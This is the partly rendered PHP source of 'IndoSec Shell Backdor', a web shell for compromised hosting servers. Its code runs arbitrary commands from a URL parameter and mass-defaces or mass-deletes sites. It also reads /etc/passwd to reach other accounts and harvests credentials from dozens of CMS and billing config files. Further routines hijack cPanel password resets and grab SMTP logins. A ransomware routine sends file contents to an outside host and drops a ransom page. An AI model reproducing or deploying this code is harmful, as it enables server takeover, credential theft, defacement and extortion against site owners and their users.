{ INDOSEC }

Shell Backdor

---

Home Upload Buat File Buat Folder Mass Deface Mass Delete Jumping Config Adminer Symlink Auto Reset Cpanel Ransomware SMTP Grabber Bypass Cloud Flare About Us keluar

Terminal :

---

Informasi :

PHP	:
IP Server	:
HDD	Total : Free : []
Doamin Web	:
MySQL	:
CURL	:
Sistem Operasi	:

---

"; echo system($_GET['cmd']); echo ''; exit; } //keluar if (isset($_GET['keluar'])) { session_start(); session_destroy(); echo ''; } if (isset($_GET['about'])) { echo '

{ IndoSec }

{ IndoSec } Adalah Sebuah Komunitas Yang Berfokus Kepada Teknologi Di Indonesia, Dari Membuat Mengamankan Dan Mengexploitasi Sebuah Sistem.

Copyright 2019 { IndoSec }

'; exit; } //upload if ($_GET['aksi'] == 'upload') { echo '

Choose file

'; if (isset($_POST['upload'])) { $countfiles = count($_FILES['file']['name']); for ($i = 0; $i < $countfiles; $i++) { $filename = $_FILES['file']['name'][$i]; $uplo = @copy($_FILES['file']['tmp_name'][$i], "$dir/".$filename); } if ($uplo) { echo ''; } else { echo ''; } } } //openfile if (isset($_GET['file'])) { $file = $_GET['file']; } //buat_file if ($_GET['aksi'] == 'buat_file') { echo "

Buat File:

Bikin!!

"; if (isset($_POST['bikin'])) { $nama_file = $_POST['nama_file']; $isi_file = $_POST['isi_file']; $handle = fopen("$nama_file", 'w'); if (fwrite($handle, $isi_file)) { echo ''; } else { echo ''; } } } /* View */ if ($_GET['aksi'] == 'view') { echo '[ Lihat ] [ Edit ] [ Rename ] [ Delete ]'; echo "".htmlspecialchars(file_get_contents($file)).''; } /* Edit */ if ($_GET['aksi'] == 'edit') { $nama = basename($file); echo '[ Lihat ] [ Edit ] [ Rename ] [ Delete ]'; echo "

Edit File : $nama

".htmlspecialchars(file_get_contents($file))."
Update

"; if (isset($_POST['edit_file'])) { $updt = fopen("$file", 'w'); $hasil = fwrite($updt, $_POST['isi']); if ($hasil) { echo ''; } else { echo ''; } } } /* Rename */ if ($_GET['aksi'] == 'rename') { $nama = basename($file); echo '[ Lihat ] [ Edit ] [ Rename ] [ Delete ]'; echo "

Rename File : $nama

Update

"; if (isset($_POST['rename_file'])) { $lama = $file; $baru = $_POST['namanew']; rename($baru, $lama); if (file_exists($baru)) { echo ''; } else { if (rename($lama, $baru)) { echo ''; } else { echo ''; } } } } /* Delete File */ if ($_GET['aksi'] == 'hapusf') { $nama = basename($file); echo '[ Lihat ] [ Edit ] [ Rename ] [ Delete ]'; echo "

Yakin Menghapus : $nama

Tidak

"; if ($_POST['ya']) { $hapus = unlink($file); if ($hapus) { echo ''; } else { echo ''; } } } /* Add Folder */ if ($_GET['aksi'] == 'buat_folder') { echo "

Buat Folder:

Buat!!

"; if (isset($_POST['buat'])) { $nama_folder = $_POST['nama_folder']; $folder = preg_replace("([^\w\s\d\-_~,;:\[\]\(\].]|[\.]{2,})", '', $_POST['nama_folder']); $fd = mkdir($folder); if ($fd) { echo ''; } else { echo "echo '"; } } } /* Delete Folder */ if ($_GET['aksi'] == 'hapus_folder') { $nama = basename(getcwd()); echo "[ Rename ] [ Delete ]

Apakah Yakin Menghapus : $nama ?

Tidak

"; if ($_POST['ya']) { if (is_dir($dir)) { if (is_writable($dir)) { @rmdir($dir); @exe("rm -rf $dir"); @exe("rmdir /s /q $dir"); echo ""; } else { echo ""; } } } exit; } /* Rename Folder */ if ($_GET['aksi'] == 'rename_folder') { $nama = basename(getcwd()); echo "[ Rename ] [ Delete ]

Rename Folder : $nama

Ganti!!

"; if (isset($_POST['ganti'])) { $lama = $dir; $baru = $_POST['namanew']; $ubah = rename($lama, $baru); if ($ubah) { echo ""; } else { echo ""; } } exit; } /* * Fungsi_Tambahan * */ /* mass delete */ if ($_GET['aksi'] == 'masdel') { function hapus_massal($dir, $namafile) { if (is_writable($dir)) { $dira = scandir($dir); foreach ($dira as $dirb) { $dirc = "$dir/$dirb"; $lokasi = $dirc.'/'.$namafile; if ($dirb === '.') { if (file_exists("$dir/$namafile")) { unlink("$dir/$namafile"); } } elseif ($dirb === '..') { if (file_exists(''.dirname($dir)."/$namafile")) { unlink(''.dirname($dir)."/$namafile"); } } else { if (is_dir($dirc)) { if (is_writable($dirc)) { if ($lokasi) { echo "$lokasi > Terhapus\n"; unlink($lokasi); hapus_massal($dirc, $namafile); } } } } } } } if ($_POST['start']) { echo "[ Kembali ] "; hapus_massal($_POST['d_dir'], $_POST['d_file']); echo '
'; } else { echo "

Lokasi :

Nama File :

"; } exit; } /* Mass Deface */ if ($_GET['aksi'] == 'masdef') { function tipe_massal($dir, $namafile, $isi_script) { if (is_writable($dir)) { $dira = scandir($dir); foreach ($dira as $dirb) { $dirc = "$dir/$dirb"; $lokasi = $dirc.'/'.$namafile; if ($dirb === '.') { file_put_contents($lokasi, $isi_script); } elseif ($dirb === '..') { file_put_contents($lokasi, $isi_script); } else { if (is_dir($dirc)) { if (is_writable($dirc)) { echo "Done > $lokasi\n"; file_put_contents($lokasi, $isi_script); tipe_massal($dirc, $namafile, $isi_script); } } } } } } function tipe_biasa($dir, $namafile, $isi_script) { if (is_writable($dir)) { $dira = scandir($dir); foreach ($dira as $dirb) { $dirc = "$dir/$dirb"; $lokasi = $dirc.'/'.$namafile; if ($dirb === '.') { file_put_contents($lokasi, $isi_script); } elseif ($dirb === '..') { file_put_contents($lokasi, $isi_script); } else { if (is_dir($dirc)) { if (is_writable($dirc)) { echo "Done > $dirb/$namafile\n"; file_put_contents($lokasi, $isi_script); } else { echo '

gagal

'; } } } } } } if ($_POST['start']) { echo "[ Kembali ] "; if ($_POST['tipe'] == 'mahal') { tipe_massal($_POST['d_dir'], $_POST['d_file'], $_POST['script']); } elseif ($_POST['tipe'] == 'murah') { tipe_biasa($_POST['d_dir'], $_POST['d_file'], $_POST['script']); } echo '
'; } else { echo "

Tipe :

Biasa Masal

Lokasi :

Nama File :

Isi File :

"; } exit; } /* Jumping */ if ($_GET['aksi'] == 'jumping') { $i = 0; echo "

"; if (preg_match('/hsphere/', $dir)) { $urls = explode("\r\n", $_POST['url']); if (isset($_POST['jump'])) { echo '

';
            foreach ($urls as $url) {
                $url = str_replace(['http://', 'www.'], '', strtolower($url));
                $etc = '/etc/passwd';
                $f = fopen($etc, 'r');
                while ($gets = fgets($f)) {
                    $pecah = explode(':', $gets);
                    $user = $pecah[0];
                    $dir_user = "/hsphere/local/home/$user";
                    if (is_dir($dir_user) === true) {
                        $url_user = $dir_user.'/'.$url;
                        if (is_readable($url_user)) {
                            $i++;
                            $jrw = "[R] $url_user";
                            if (is_writable($url_user)) {
                                $jrw = "[RW] $url_user";
                            }
                            echo $jrw.'
';
                        }
                    }
                }
            }
            if ($i == 0) {
            } else {
                echo '
Total ada '.$i.' Kamar di '.$ip;
            }
            echo '

'; } else { echo '

List Domains:
'; $fp = fopen('/hsphere/local/config/httpd/sites/sites.txt', 'r'); while ($getss = fgets($fp)) { echo $getss; } echo '

'; } } elseif (preg_match('/vhosts/', $dir)) { $urls = explode("\r\n", $_POST['url']); if (isset($_POST['jump'])) { echo '

';
            foreach ($urls as $url) {
                $web_vh = "/var/www/vhosts/$url/httpdocs";
                if (is_dir($web_vh) === true) {
                    if (is_readable($web_vh)) {
                        $i++;
                        $jrw = "[R] $web_vh";
                        if (is_writable($web_vh)) {
                            $jrw = "[RW] $web_vh";
                        }
                        echo $jrw.'
';
                    }
                }
            }
            if ($i == 0) {
            } else {
                echo '
Total ada '.$i.' Kamar di '.$ip;
            }
            echo '

'; } else { echo '

List Domains:
'; bing("ip:$ip"); echo '

'; } } else { echo '

';
        $etc = fopen('/etc/passwd', 'r') or die("Can't read /etc/passwd
");
        while ($passwd = fgets($etc)) {
            if ($passwd == '' || !$etc) {
                echo "Can't read /etc/passwd
";
            } else {
                preg_match_all('/(.*?):x:/', $passwd, $user_jumping);
                foreach ($user_jumping[1] as $user_pro_jump) {
                    $user_jumping_dir = "/home/$user_pro_jump/public_html";
                    if (is_readable($user_jumping_dir)) {
                        $i++;
                        $jrw = "[R] $user_jumping_dir";
                        if (is_writable($user_jumping_dir)) {
                            $jrw = "[RW] $user_jumping_dir";
                        }
                        echo $jrw;
                        if (function_exists('posix_getpwuid')) {
                            $domain_jump = file_get_contents('/etc/named.conf');
                            if ($domain_jump == '') {
                                echo ' => ( gabisa ambil nama domain nya )
';
                            } else {
                                preg_match_all('#/var/named/(.*?).db#', $domain_jump, $domains_jump);
                                foreach ($domains_jump[1] as $dj) {
                                    $user_jumping_url = posix_getpwuid(@fileowner("/etc/valiases/$dj"));
                                    $user_jumping_url = $user_jumping_url['name'];
                                    if ($user_jumping_url == $user_pro_jump) {
                                        echo " => ( $dj )
";
                                        break;
                                    }
                                }
                            }
                        } else {
                            echo '
';
                        }
                    }
                }
            }
        }
        if ($i == 0) {
        } else {
            echo '
Total ada '.$i.' Kamar di '.$ip;
        }
        echo '

'; } echo '

'; exit; } /* Config */ if ($_GET['aksi'] == 'config') { $etc = fopen('/etc/passwd', 'r') or die("

Can't read /etc/passwd

"); $con = mkdir('indosec_config', 0777); $isi_htc = "Options all\nRequire None\nSatisfy Any"; $htc = fopen('indosec_config/.htaccess', 'w'); fwrite($htc, $isi_htc); while ($passwd = fgets($etc)) { if ($passwd == '' || !$etc) { echo "Can't read /etc/passwd"; } else { preg_match_all('/(.*?):x:/', $passwd, $user_config); foreach ($user_config[1] as $user_con) { $user_config_dir = "/home/$user_con/public_html/"; if (is_readable($user_config_dir)) { $grab_config = [ "/home/$user_con/.my.cnf" => 'cpanel', "/home/$user_con/public_html/config/koneksi.php" => 'Lokomedia', "/home/$user_con/public_html/forum/config.php" => 'phpBB', "/home/$user_con/public_html/sites/default/settings.php" => 'Drupal', "/home/$user_con/public_html/config/settings.inc.php" => 'PrestaShop', "/home/$user_con/public_html/app/etc/local.xml" => 'Magento', "/home/$user_con/public_html/admin/config.php" => 'OpenCart', "/home/$user_con/public_html/application/config/database.php" => 'Ellislab', "/home/$user_con/public_html/vb/includes/config.php" => 'Vbulletin', "/home/$user_con/public_html/includes/config.php" => 'Vbulletin', "/home/$user_con/public_html/forum/includes/config.php" => 'Vbulletin', "/home/$user_con/public_html/forums/includes/config.php" => 'Vbulletin', "/home/$user_con/public_html/cc/includes/config.php" => 'Vbulletin', "/home/$user_con/public_html/inc/config.php" => 'MyBB', "/home/$user_con/public_html/includes/configure.php" => 'OsCommerce', "/home/$user_con/public_html/shop/includes/configure.php" => 'OsCommerce', "/home/$user_con/public_html/os/includes/configure.php" => 'OsCommerce', "/home/$user_con/public_html/oscom/includes/configure.php" => 'OsCommerce', "/home/$user_con/public_html/products/includes/configure.php" => 'OsCommerce', "/home/$user_con/public_html/cart/includes/configure.php" => 'OsCommerce', "/home/$user_con/public_html/inc/conf_global.php" => 'IPB', "/home/$user_con/public_html/wp-config.php" => 'Wordpress', "/home/$user_con/public_html/wp/test/wp-config.php" => 'Wordpress', "/home/$user_con/public_html/blog/wp-config.php" => 'Wordpress', "/home/$user_con/public_html/beta/wp-config.php" => 'Wordpress', "/home/$user_con/public_html/portal/wp-config.php" => 'Wordpress', "/home/$user_con/public_html/site/wp-config.php" => 'Wordpress', "/home/$user_con/public_html/wp/wp-config.php" => 'Wordpress', "/home/$user_con/public_html/WP/wp-config.php" => 'Wordpress', "/home/$user_con/public_html/news/wp-config.php" => 'Wordpress', "/home/$user_con/public_html/wordpress/wp-config.php" => 'Wordpress', "/home/$user_con/public_html/test/wp-config.php" => 'Wordpress', "/home/$user_con/public_html/demo/wp-config.php" => 'Wordpress', "/home/$user_con/public_html/home/wp-config.php" => 'Wordpress', "/home/$user_con/public_html/v1/wp-config.php" => 'Wordpress', "/home/$user_con/public_html/v2/wp-config.php" => 'Wordpress', "/home/$user_con/public_html/press/wp-config.php" => 'Wordpress', "/home/$user_con/public_html/new/wp-config.php" => 'Wordpress', "/home/$user_con/public_html/blogs/wp-config.php" => 'Wordpress', "/home/$user_con/public_html/configuration.php" => 'Joomla', "/home/$user_con/public_html/blog/configuration.php" => 'Joomla', "/home/$user_con/public_html/submitticket.php" => '^WHMCS', "/home/$user_con/public_html/cms/configuration.php" => 'Joomla', "/home/$user_con/public_html/beta/configuration.php" => 'Joomla', "/home/$user_con/public_html/portal/configuration.php" => 'Joomla', "/home/$user_con/public_html/site/configuration.php" => 'Joomla', "/home/$user_con/public_html/main/configuration.php" => 'Joomla', "/home/$user_con/public_html/home/configuration.php" => 'Joomla', "/home/$user_con/public_html/demo/configuration.php" => 'Joomla', "/home/$user_con/public_html/test/configuration.php" => 'Joomla', "/home/$user_con/public_html/v1/configuration.php" => 'Joomla', "/home/$user_con/public_html/v2/configuration.php" => 'Joomla', "/home/$user_con/public_html/joomla/configuration.php" => 'Joomla', "/home/$user_con/public_html/new/configuration.php" => 'Joomla', "/home/$user_con/public_html/WHMCS/submitticket.php" => 'WHMCS', "/home/$user_con/public_html/whmcs1/submitticket.php" => 'WHMCS', "/home/$user_con/public_html/Whmcs/submitticket.php" => 'WHMCS', "/home/$user_con/public_html/whmcs/submitticket.php" => 'WHMCS', "/home/$user_con/public_html/whmcs/submitticket.php" => 'WHMCS', "/home/$user_con/public_html/WHMC/submitticket.php" => 'WHMCS', "/home/$user_con/public_html/Whmc/submitticket.php" => 'WHMCS', "/home/$user_con/public_html/whmc/submitticket.php" => 'WHMCS', "/home/$user_con/public_html/WHM/submitticket.php" => 'WHMCS', "/home/$user_con/public_html/Whm/submitticket.php" => 'WHMCS', "/home/$user_con/public_html/whm/submitticket.php" => 'WHMCS', "/home/$user_con/public_html/HOST/submitticket.php" => 'WHMCS', "/home/$user_con/public_html/Host/submitticket.php" => 'WHMCS', "/home/$user_con/public_html/host/submitticket.php" => 'WHMCS', "/home/$user_con/public_html/SUPPORTES/submitticket.php" => 'WHMCS', "/home/$user_con/public_html/Supportes/submitticket.php" => 'WHMCS', "/home/$user_con/public_html/supportes/submitticket.php" => 'WHMCS', "/home/$user_con/public_html/domains/submitticket.php" => 'WHMCS', "/home/$user_con/public_html/domain/submitticket.php" => 'WHMCS', "/home/$user_con/public_html/Hosting/submitticket.php" => 'WHMCS', "/home/$user_con/public_html/HOSTING/submitticket.php" => 'WHMCS', "/home/$user_con/public_html/hosting/submitticket.php" => 'WHMCS', "/home/$user_con/public_html/CART/submitticket.php" => 'WHMCS', "/home/$user_con/public_html/Cart/submitticket.php" => 'WHMCS', "/home/$user_con/public_html/cart/submitticket.php" => 'WHMCS', "/home/$user_con/public_html/ORDER/submitticket.php" => 'WHMCS', "/home/$user_con/public_html/Order/submitticket.php" => 'WHMCS', "/home/$user_con/public_html/order/submitticket.php" => 'WHMCS', "/home/$user_con/public_html/CLIENT/submitticket.php" => 'WHMCS', "/home/$user_con/public_html/Client/submitticket.php" => 'WHMCS', "/home/$user_con/public_html/client/submitticket.php" => 'WHMCS', "/home/$user_con/public_html/CLIENTAREA/submitticket.php" => 'WHMCS', "/home/$user_con/public_html/Clientarea/submitticket.php" => 'WHMCS', "/home/$user_con/public_html/clientarea/submitticket.php" => 'WHMCS', "/home/$user_con/public_html/SUPPORT/submitticket.php" => 'WHMCS', "/home/$user_con/public_html/Support/submitticket.php" => 'WHMCS', "/home/$user_con/public_html/support/submitticket.php" => 'WHMCS', "/home/$user_con/public_html/BILLING/submitticket.php" => 'WHMCS', "/home/$user_con/public_html/Billing/submitticket.php" => 'WHMCS', "/home/$user_con/public_html/billing/submitticket.php" => 'WHMCS', "/home/$user_con/public_html/BUY/submitticket.php" => 'WHMCS', "/home/$user_con/public_html/Buy/submitticket.php" => 'WHMCS', "/home/$user_con/public_html/buy/submitticket.php" => 'WHMCS', "/home/$user_con/public_html/MANAGE/submitticket.php" => 'WHMCS', "/home/$user_con/public_html/Manage/submitticket.php" => 'WHMCS', "/home/$user_con/public_html/manage/submitticket.php" => 'WHMCS', "/home/$user_con/public_html/CLIENTSUPPORT/submitticket.php" => 'WHMCS', "/home/$user_con/public_html/ClientSupport/submitticket.php" => 'WHMCS', "/home/$user_con/public_html/Clientsupport/submitticket.php" => 'WHMCS', "/home/$user_con/public_html/clientsupport/submitticket.php" => 'WHMCS', "/home/$user_con/public_html/CHECKOUT/submitticket.php" => 'WHMCS', "/home/$user_con/public_html/Checkout/submitticket.php" => 'WHMCS', "/home/$user_con/public_html/checkout/submitticket.php" => 'WHMCS', "/home/$user_con/public_html/BILLINGS/submitticket.php" => 'WHMCS', "/home/$user_con/public_html/Billings/submitticket.php" => 'WHMCS', "/home/$user_con/public_html/billings/submitticket.php" => 'WHMCS', "/home/$user_con/public_html/BASKET/submitticket.php" => 'WHMCS', "/home/$user_con/public_html/Basket/submitticket.php" => 'WHMCS', "/home/$user_con/public_html/basket/submitticket.php" => 'WHMCS', "/home/$user_con/public_html/SECURE/submitticket.php" => 'WHMCS', "/home/$user_con/public_html/Secure/submitticket.php" => 'WHMCS', "/home/$user_con/public_html/secure/submitticket.php" => 'WHMCS', "/home/$user_con/public_html/SALES/submitticket.php" => 'WHMCS', "/home/$user_con/public_html/Sales/submitticket.php" => 'WHMCS', "/home/$user_con/public_html/sales/submitticket.php" => 'WHMCS', "/home/$user_con/public_html/BILL/submitticket.php" => 'WHMCS', "/home/$user_con/public_html/Bill/submitticket.php" => 'WHMCS', "/home/$user_con/public_html/bill/submitticket.php" => 'WHMCS', "/home/$user_con/public_html/PURCHASE/submitticket.php" => 'WHMCS', "/home/$user_con/public_html/Purchase/submitticket.php" => 'WHMCS', "/home/$user_con/public_html/purchase/submitticket.php" => 'WHMCS', "/home/$user_con/public_html/ACCOUNT/submitticket.php" => 'WHMCS', "/home/$user_con/public_html/Account/submitticket.php" => 'WHMCS', "/home/$user_con/public_html/account/submitticket.php" => 'WHMCS', "/home/$user_con/public_html/USER/submitticket.php" => 'WHMCS', "/home/$user_con/public_html/User/submitticket.php" => 'WHMCS', "/home/$user_con/public_html/user/submitticket.php" => 'WHMCS', "/home/$user_con/public_html/CLIENTS/submitticket.php" => 'WHMCS', "/home/$user_con/public_html/Clients/submitticket.php" => 'WHMCS', "/home/$user_con/public_html/clients/submitticket.php" => 'WHMCS', "/home/$user_con/public_html/BILLINGS/submitticket.php" => 'WHMCS', "/home/$user_con/public_html/Billings/submitticket.php" => 'WHMCS', "/home/$user_con/public_html/billings/submitticket.php" => 'WHMCS', "/home/$user_con/public_html/MY/submitticket.php" => 'WHMCS', "/home/$user_con/public_html/My/submitticket.php" => 'WHMCS', "/home/$user_con/public_html/my/submitticket.php" => 'WHMCS', "/home/$user_con/public_html/secure/whm/submitticket.php" => 'WHMCS', "/home/$user_con/public_html/secure/whmcs/submitticket.php" => 'WHMCS', "/home/$user_con/public_html/panel/submitticket.php" => 'WHMCS', "/home/$user_con/public_html/clientes/submitticket.php" => 'WHMCS', "/home/$user_con/public_html/cliente/submitticket.php" => 'WHMCS', "/home/$user_con/public_html/support/order/submitticket.php" => 'WHMCS', "/home/$user_con/public_html/bb-config.php" => 'BoxBilling', "/home/$user_con/public_html/boxbilling/bb-config.php" => 'BoxBilling', "/home/$user_con/public_html/box/bb-config.php" => 'BoxBilling', "/home/$user_con/public_html/host/bb-config.php" => 'BoxBilling', "/home/$user_con/public_html/Host/bb-config.php" => 'BoxBilling', "/home/$user_con/public_html/supportes/bb-config.php" => 'BoxBilling', "/home/$user_con/public_html/support/bb-config.php" => 'BoxBilling', "/home/$user_con/public_html/hosting/bb-config.php" => 'BoxBilling', "/home/$user_con/public_html/cart/bb-config.php" => 'BoxBilling', "/home/$user_con/public_html/order/bb-config.php" => 'BoxBilling', "/home/$user_con/public_html/client/bb-config.php" => 'BoxBilling', "/home/$user_con/public_html/clients/bb-config.php" => 'BoxBilling', "/home/$user_con/public_html/cliente/bb-config.php" => 'BoxBilling', "/home/$user_con/public_html/clientes/bb-config.php" => 'BoxBilling', "/home/$user_con/public_html/billing/bb-config.php" => 'BoxBilling', "/home/$user_con/public_html/billings/bb-config.php" => 'BoxBilling', "/home/$user_con/public_html/my/bb-config.php" => 'BoxBilling', "/home/$user_con/public_html/secure/bb-config.php" => 'BoxBilling', "/home/$user_con/public_html/support/order/bb-config.php" => 'BoxBilling', "/home/$user_con/public_html/includes/dist-configure.php" => 'Zencart', "/home/$user_con/public_html/zencart/includes/dist-configure.php" => 'Zencart', "/home/$user_con/public_html/products/includes/dist-configure.php" => 'Zencart', "/home/$user_con/public_html/cart/includes/dist-configure.php" => 'Zencart', "/home/$user_con/public_html/shop/includes/dist-configure.php" => 'Zencart', "/home/$user_con/public_html/includes/iso4217.php" => 'Hostbills', "/home/$user_con/public_html/hostbills/includes/iso4217.php" => 'Hostbills', "/home/$user_con/public_html/host/includes/iso4217.php" => 'Hostbills', "/home/$user_con/public_html/Host/includes/iso4217.php" => 'Hostbills', "/home/$user_con/public_html/supportes/includes/iso4217.php" => 'Hostbills', "/home/$user_con/public_html/support/includes/iso4217.php" => 'Hostbills', "/home/$user_con/public_html/hosting/includes/iso4217.php" => 'Hostbills', "/home/$user_con/public_html/cart/includes/iso4217.php" => 'Hostbills', "/home/$user_con/public_html/order/includes/iso4217.php" => 'Hostbills', "/home/$user_con/public_html/client/includes/iso4217.php" => 'Hostbills', "/home/$user_con/public_html/clients/includes/iso4217.php" => 'Hostbills', "/home/$user_con/public_html/cliente/includes/iso4217.php" => 'Hostbills', "/home/$user_con/public_html/clientes/includes/iso4217.php" => 'Hostbills', "/home/$user_con/public_html/billing/includes/iso4217.php" => 'Hostbills', "/home/$user_con/public_html/billings/includes/iso4217.php" => 'Hostbills', "/home/$user_con/public_html/my/includes/iso4217.php" => 'Hostbills', "/home/$user_con/public_html/secure/includes/iso4217.php" => 'Hostbills', "/home/$user_con/public_html/support/order/includes/iso4217.php" => 'Hostbills', ]; foreach ($grab_config as $config => $nama_config) { $ambil_config = file_get_contents($config); if ($ambil_config == '') { } else { $file_config = fopen("indosec_config/$user_con-$nama_config.txt", 'w'); fwrite($file_config, $ambil_config); } } } } } } echo "Done"; exit; } /* Adminer */ if ($_GET['aksi'] == 'adminer') { $full = str_replace($_SERVER['DOCUMENT_ROOT'], '', $dir); function adminer($url, $isi) { $fp = fopen($isi, 'w'); $ch = curl_init(); curl_setopt($ch, CURLOPT_URL, $url); curl_setopt($ch, CURLOPT_BINARYTRANSFER, true); curl_setopt($ch, CURLOPT_RETURNTRANSFER, true); curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false); curl_setopt($ch, CURLOPT_FILE, $fp); return curl_exec($ch); curl_close($ch); fclose($fp); ob_flush(); flush(); } if (file_exists('adminer.php')) { echo "-> adminer login <-
"; } else { if (adminer('https://www.adminer.org/static/download/4.2.4/adminer-4.2.4.php', 'adminer.php')) { echo "-> adminer login <-
"; } else { echo 'gagal buat file adminer
'; } } exit; } /* Symlink */ if ($_GET['aksi'] == 'symlink') { if (!is_file('named.txt')) { $d00m = @file('/etc/named.conf'); } else { $d00m = @file('named.txt'); } if (!$d00m) { die("[ Bypass Read ] [ Symlink 404 ] [ Symlink Bypass ]
Error tidak dapat membaca /etc/named.conf

"); } else { echo "[ Bypass Read ] [ Symlink 404 ] [ Symlink Bypass ]

"; foreach ($d00m as $dom) { if (eregi('zone', $dom)) { preg_match_all('#zone "(.*)"#', $dom, $domsws); flush(); if (strlen(trim($domsws[1][0])) > 2) { $user = posix_getpwuid(@fileowner('/etc/valiases/'.$domsws[1][0])); flush(); $site = $user['name']; @symlink('/', 'sym/root'); $site = $domsws[1][0]; $ir = 'ir'; $il = 'il'; if (preg_match("/.^$ir/", $domsws[1][0]) or preg_match("/.^$il/", $domsws[1][0])) { $site = ".$domsws[1][0]."; } echo " "; flush(); flush(); } } } echo '

Domains	Users	symlink
'.$site.'	'.$user['name']."	Symlink

'; } exit; } if ($_GET['aksi'] == 'symread') { echo 'read /etc/named.conf'; echo "

"; flush(); flush(); $file = '/etc/named.conf'; $r3ad = @fopen($file, 'r'); if ($r3ad) { $content = @fread($r3ad, @filesize($file)); echo ''.htmlentities($content).''; } elseif (!$r3ad) { $r3ad = @highlight_file($file); } elseif (!$r3ad) { $r3ad = @highlight_file($file); } elseif (!$r3ad) { $sm = @symlink($file, 'sym.txt'); if ($sm) { $r3ad = @fopen('sym/sym.txt', 'r'); $content = @fread($r3ad, @filesize($file)); echo ''.htmlentities($content).''; } } echo "

"; if (isset($_GET['save'])) { $cont = stripcslashes($_POST['file']); $f = fopen('named.txt', 'w'); $w = fwrite($f, $cont); if ($w) { echo '
save has been successfully'; } fclose($f); } exit; } if ($_GET['aksi'] == 'sym_404') { echo '

Symlink 404

File Target:
Save As:

'; if ($_POST['execute']) { rmdir('indosec_sym404'); mkdir('indosec_sym404', 0777); $dir = $_POST['dir']; $isi = $_POST['isi']; system('ln -s '.$dir.'indosec_sym404/'.$isi); symlink($dir, 'indosec_sym404/'.$isi); $inija = fopen('indosec_sym404/.htaccess', 'w'); fwrite($inija, 'ReadmeName '.$isi."\nOptions Indexes FollowSymLinks\nDirectoryIndex ids.html\nAddType text/plain .php\nAddHandler text/plain .php\nSatisfy Any"); echo' >>Sukses<< '; } exit; } if ($_GET['aksi'] == 'sym_bypas') { if (isset($_GET['save']) and isset($_POST['file']) or @filesize('passwd.txt') > 0) { $cont = stripcslashes($_POST['file']); if (!file_exists('passwd.txt')) { $f = @fopen('passwd.txt', 'w'); $w = @fwrite($f, $cont); fclose($f); } if ($w or @filesize('passwd.txt') > 0) { echo "

"; flush(); $fil3 = file('passwd.txt'); foreach ($fil3 as $f) { $u = explode(':', $f); $user = $u['0']; echo ""; flush(); flush(); } die('

Users	symlink	FTP
$user	Symlink	FTP

'); } } echo 'read /etc/passwd'; echo "

"; flush(); $file = '/etc/passwd'; $r3ad = @fopen($file, 'r'); if ($r3ad) { $content = @fread($r3ad, @filesize($file)); echo ''.htmlentities($content).''; } elseif (!$r3ad) { $r3ad = @highlight_file($file); } elseif (!$r3ad) { $r3ad = @highlight_file($file); } elseif (!$r3ad) { for ($uid = 0; $uid < 1000; $uid++) { $ara = posix_getpwuid($uid); if (!empty($ara)) { while (list($key, $val) = each($ara)) { echo "$val:"; } echo "\n"; } } } flush(); echo "

"; flush(); exit; } if ($_GET['aksi'] == 'resetpasscp') { echo '

Auto Reset Password Cpanel

'; if (isset($_POST['submit'])) { $user = get_current_user(); $site = $_SERVER['HTTP_HOST']; $ips = getenv('REMOTE_ADDR'); $email = $_POST['email']; $wr = 'email:'.$email; $f = fopen('/home/'.$user.'/.cpanel/contactinfo', 'w'); fwrite($f, $wr); fclose($f); $f = fopen('/home/'.$user.'/.contactinfo', 'w'); fwrite($f, $wr); fclose($f); $parm = $site.':2082/resetpass?start=1'; echo '
Url: '.$parm.''; echo '
Username: '.$user.''; echo '
Success Reset To: '.$email.'

'; } exit; } if ($_GET['aksi'] == 'ransom') { echo '

Directory Yang Ingin diencrypt

'; if (isset($_POST['encrypt'])) { $target = $_POST['target']; function listFolderFiles($target) { if (is_dir($target)) { $ffs = scandir($target); unset($ffs[array_search('.', $ffs, true)]); unset($ffs[array_search('..', $ffs, true)]); if (count($ffs) < 1) { return; } foreach ($ffs as $ff) { $files = $target.'/'.$ff; if (!is_dir($files)) { /* encrypt file */ $file = file_get_contents($files); $_a = base64_encode($file); /* proses curl */ $ch = curl_init(); curl_setopt($ch, CURLOPT_URL, 'http://encrypt.indsc.me/api.php?type=encrypt'); curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); curl_setopt($ch, CURLOPT_POSTFIELDS, "text=$_a"); $x = json_decode(curl_exec($ch)); if ($x->status == 'success') { $_enc = base64_decode($x->data); rename($files, $files.'.indsc'); echo "[+]$files => Success Encrypted\n"; } } if (is_dir($target.'/'.$ff)) { listFolderFiles($target.'/'.$ff); } } $index = file_get_contents('https://pastebin.com/raw/aGZ6BeTH'); $_o = fopen($target.'/index.html', 'w'); fwrite($_o, $index); fclose($_o); echo "\n[+] Done !"; } else { echo "\nBukan dir"; } } echo""; listFolderFiles($target); echo '
'; } exit; } if ($_GET['aksi'] == 'smtpgrab') { function scj($dir) { $dirs = scandir($dir); foreach ($dirs as $dirb) { if (!is_file("$dir/$dirb")) { continue; } $ambil = file_get_contents("$dir/$dirb"); $ambil = str_replace('$', '', $ambil); if (preg_match('/JConfig|joomla/', $ambil)) { $smtp_host = ambilkata($ambil, "smtphost = '", "'"); $smtp_auth = ambilkata($ambil, "smtpauth = '", "'"); $smtp_user = ambilkata($ambil, "smtpuser = '", "'"); $smtp_pass = ambilkata($ambil, "smtppass = '", "'"); $smtp_port = ambilkata($ambil, "smtpport = '", "'"); $smtp_secure = ambilkata($ambil, "smtpsecure = '", "'"); echo "

SMTP Host: $smtp_host

SMTP Port: $smtp_port

SMTP User: $smtp_user

SMTP Pass: $smtp_pass

SMTP Auth: $smtp_auth

SMTP Secure: $smtp_secure

"; } } } echo "

NB : Tools ini work jika dijalankan di dalam folder config ( ex: /home/user/public_html/namafolder_config )

"; $smtp = scj($dir); exit; } if ($_GET['aksi'] == 'bypascf') { echo '

Pilih Metode ftp direct-conntect Webmail Cpanel

'; $target = $_POST['target']; // Bypass From FTP if ($_POST['idsPilih'] == 'ftp') { $ftp = gethostbyname('ftp.'."$target"); echo "

Correct ip is : $ftp

"; } // Bypass From Direct-Connect if ($_POST['idsPilih'] == 'direct-conntect') { $direct = gethostbyname('direct-connect.'."$target"); echo "

Correct ip is : $direct

"; } // Bypass From Webmail if ($_POST['idsPilih'] == 'webmail') { $web = gethostbyname('webmail.'."$target"); echo "

Correct ip is : $web

"; } // Bypass From Cpanel if ($_POST['idsPilih'] == 'cpanel') { $cpanel = gethostbyname('cpanel.'."$target"); echo "

Correct ip is : $cpanel

